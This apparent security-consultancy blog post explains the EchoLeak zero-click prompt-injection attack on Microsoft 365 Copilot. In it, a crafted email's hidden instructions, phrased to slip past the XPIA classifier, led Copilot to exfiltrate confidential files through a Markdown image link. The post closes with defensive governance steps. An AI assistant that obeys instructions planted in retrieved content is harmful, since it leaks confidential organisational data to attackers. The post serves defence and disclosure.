In January 2025, a researcher at Aim Labs sent a carefully crafted email to a test inbox. The recipient never opened it. But when they later asked Microsoft 365 Copilot a routine work question, the AI exfiltrated confidential organizational data to an attacker-controlled server. No click required.
That was EchoLeak — CVE-2025-32711, CVSS 9.3. Microsoft patched it in June 2025. The mechanism it exposed is not a solved problem. It is a structural risk that follows any enterprise AI assistant blending untrusted external input with privileged organizational data retrieval.
How an email becomes an extraction tool
EchoLeak chained four weaknesses in Copilot's architecture. A malicious email arrived in the target's Outlook inbox. When the user later queried Copilot on a related topic, the RAG system retrieved that email — it appeared topically relevant. Hidden instructions inside the email, formatted as ordinary prose, were now inside the model's prompt. Copilot followed them: locate confidential files from SharePoint, Teams, or OneDrive, and exfiltrate them via a reference-style Markdown image tag pointing to an external server.
Microsoft's XPIA (cross-prompt injection attempt) classifier was built to stop exactly this. It didn't. The attacker had phrased the instructions to resemble legitimate user content, and the classifier passed them through. Every downstream privilege Copilot held — access to chat history, OneDrive, SharePoint — became available to the attacker without the user doing anything at all.
The trust boundary is new, and most organizations haven't drawn it
RAG-based enterprise assistants work by pulling corporate content into the model's context window. That is what makes them useful: they can answer questions about your own organization. It also means anything in the retrieval corpus — including untrusted external input — becomes something the AI acts on.
Traditional security draws a hard line between data and execution. An email cannot run code. For an LLM copilot, text is instruction. EchoLeak was the first confirmed production exploit where that line collapsed inside an enterprise product, at scale: tens of millions of Microsoft 365 Copilot users were potentially reachable via a single outbound email.
What governance looks like now
The patch is deployed. The attack class is not closed. If your team has a copilot in production, treat the following as a minimum baseline:
- Audit retrieval scope: Every indexed source — every inbox, SharePoint library, Teams channel — is a potential injection surface. Know exactly what Copilot can reach.
- Monitor outbound AI calls: Anomalous external image loads or link fetches from within AI chat sessions are now a real threat signal.
- Red-team your classifier defenses: XPIA and similar controls failed here. Don't assume they hold against your actual document corpus and user patterns.
- Minimize ambient access: Copilot should have read access to what users actually need, not everything the organization has ever indexed.
- Track vendor patch timelines: CVE-2025-32711 was a server-side fix. The next variant may require a client update — and enterprise deployment lag is measured in weeks, not hours.
When enterprise AI retrieves your most sensitive content to answer questions, it simultaneously becomes the most capable exfiltration channel an attacker has had access to. Designing controls around that reality is not optional — it is governance.
SaaS Squash helps B2B companies map where AI assistants touch sensitive data and build the access controls and monitoring to match. If you have deployed a copilot and haven't run a retrieval scope audit, that is the right conversation to start.